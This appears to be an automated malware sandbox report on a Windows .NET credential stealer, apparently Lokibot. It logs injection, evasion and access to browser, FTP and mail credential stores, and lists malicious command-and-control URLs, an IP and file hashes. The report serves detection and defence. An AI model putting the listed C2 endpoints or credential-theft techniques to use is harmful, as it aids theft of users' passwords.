            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 1330000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 3500000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 17C0000 memory commit | memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 5690000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 6690000 memory commit | memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 5690000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 5690000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 67C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 77C0000 memory commit | memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 7C10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 8C10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 5760000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 8C10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: 9C10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exe TID: 6208Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exe TID: 6428Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeThread delayed: delay time: 60000Jump to behavior
            Source: lqoUUYTMsL.exe, 00000001.00000002.1680125185.0000000000F08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
            Source: lqoUUYTMsL.exe, 00000004.00000002.1644852471.0000000000E88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
            Source: lqoUUYTMsL.exe, 00000002.00000002.1643495278.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, lqoUUYTMsL.exe, 00000003.00000002.1644354809.0000000001488000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,2_2_00402B7C
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory written: C:\Users\user\Desktop\lqoUUYTMsL.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory written: C:\Users\user\Desktop\lqoUUYTMsL.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory written: C:\Users\user\Desktop\lqoUUYTMsL.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMemory written: C:\Users\user\Desktop\lqoUUYTMsL.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exeJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exeJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exeJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exeJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: lqoUUYTMsL.exe PID: 7104, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lqoUUYTMsL.exe PID: 6408, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000001.00000002.1680125185.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: lqoUUYTMsL.exe PID: 6464, type: MEMORYSTR
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: PopPassword2_2_0040D069
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: SmtpPassword2_2_0040D069
            Source: Yara matchFile source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            2
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
            Process Injection
            1
            Disable or Modify Tools
            2
            Credentials in Registry
            41
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            41
            Virtualization/Sandbox Evasion
            Security Account Manager3
            System Information Discovery
            SMB/Windows Admin Shares2
            Data from Local System
            3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture113
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
            Process Injection
            LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Software Packing
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            lqoUUYTMsL.exe79%ReversingLabsByteCode-MSIL.Hacktool.Boilod
            lqoUUYTMsL.exe100%AviraTR/Dropper.MSIL.Gen
            lqoUUYTMsL.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://kbfvzoboss.bid/alien/fre.php100%URL Reputationmalware
            http://alphastand.win/alien/fre.php100%URL Reputationmalware
            http://alphastand.trade/alien/fre.php100%URL Reputationmalware
            http://alphastand.top/alien/fre.php100%URL Reputationmalware
            http://www.ibsensoftware.com/0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            tequilacofradiamx.com
            91.92.253.228
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://tequilacofradiamx.com/minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.phptrue
                unknown
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: malware
                unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: malware
                unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: malware
                unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: malware
                unknown
                https://tequilacofradiamx.com/minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.phptrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.ibsensoftware.com/lqoUUYTMsL.exe, lqoUUYTMsL.exe, 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tequilacofradiamx.com/lqoUUYTMsL.exe, 00000001.00000002.1680125185.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    91.92.253.228
                    tequilacofradiamx.comBulgaria
                    34368THEZONEBGtrue
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1428426
                    Start date and time:2024-04-18 23:01:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 2m 56s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:lqoUUYTMsL.exe
                    renamed because original name is a hash value
                    Original Sample Name:3113c2a7b30c1cb350e8950b4222b0c4.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@9/3@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 66%
                    • Number of executed functions: 213
                    • Number of non-executed functions: 41
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: lqoUUYTMsL.exe
                    TimeTypeDescription
                    23:01:57API Interceptor1x Sleep call for process: lqoUUYTMsL.exe modified
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    tequilacofradiamx.com1nFoPjzjGH.exeGet hashmaliciousLokibotBrowse
                    • 91.92.254.199
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    THEZONEBGHW#210872-218YAT-THEON-GLOBAL-Y801823-1AHEY361-APL38102823-19011.exeGet hashmaliciousGuLoader, PureLog Stealer, zgRATBrowse
                    • 91.92.248.36
                    cybXkFC5nF.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                    • 91.92.255.15
                    6Qz6WEKB27.elfGet hashmaliciousMiraiBrowse
                    • 91.92.243.252
                    RyykKfCeTG.elfGet hashmaliciousGafgyt, MiraiBrowse
                    • 91.92.240.254
                    OurfOY2sbZ.elfGet hashmaliciousMiraiBrowse
                    • 91.92.243.252
                    1nFoPjzjGH.exeGet hashmaliciousLokibotBrowse
                    • 91.92.254.199
                    2oBR38vDJ1.exeGet hashmaliciousRemcosBrowse
                    • 91.92.244.185
                    NDPS70IhR2.exeGet hashmaliciousZhark RATBrowse
                    • 91.92.254.233
                    2jkBlJCoHT.elfGet hashmaliciousGafgyt, MiraiBrowse
                    • 91.92.251.238
                    XCfQ4MVfVP.elfGet hashmaliciousGafgyt, MiraiBrowse
                    • 91.92.251.238
                    No context
                    No context
                    Process:C:\Users\user\Desktop\lqoUUYTMsL.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):525
                    Entropy (8bit):5.259753436570609
                    Encrypted:false
                    SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
                    MD5:260E01CC001F9C4643CA7A62F395D747
                    SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
                    SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
                    SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
                    Process:C:\Users\user\Desktop\lqoUUYTMsL.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:1
                    Process:C:\Users\user\Desktop\lqoUUYTMsL.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):46
                    Entropy (8bit):1.0424600748477153
                    Encrypted:false
                    SSDEEP:3:/lbq:4
                    MD5:8CB7B7F28464C3FCBAE8A10C46204572
                    SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                    SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                    SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:........................................user.
                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.849189397617287
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    • Win32 Executable (generic) a (10002005/4) 49.96%
                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    File name:lqoUUYTMsL.exe
                    File size:369'664 bytes
                    MD5:3113c2a7b30c1cb350e8950b4222b0c4
                    SHA1:2fe0c50dd095a738788693e147c0b9d883554d2c
                    SHA256:7ff1d7dd5684cd38bea4a227bf49d4ceff1de7d2f66a556ccc6ce1a382640fc6
                    SHA512:4287e194b702492c3b0c960fc4a0cc1625607789e382b88276eaa9749f3ff32f38cf81da3543601cd1f9e2704366385962f421568702bb72a621cddf77aa58cd
                    SSDEEP:6144:MHM3730X5T4avIrevXJZzkhq8R8ahdMSM9C/JWJu0GTY8odnR1j3hfbJHtFy7tcQ:p3cT4Ed3YQG8SM9LJV3dnRLbJHtFy7tJ
                    TLSH:C274AEAC726072EFC85BD472DEA82D68EB51747B931B5203A41706ADEE4C897CF150F2
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-.f..................................... ....@.. ....................... ............@................................
                    Icon Hash:2341c0e0e0e07133
                    Entrypoint:0x45e00a
                    Entrypoint Section:
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x661D2DCE [Mon Apr 15 13:38:22 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                    Instruction
                    jmp dword ptr [0045E000h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
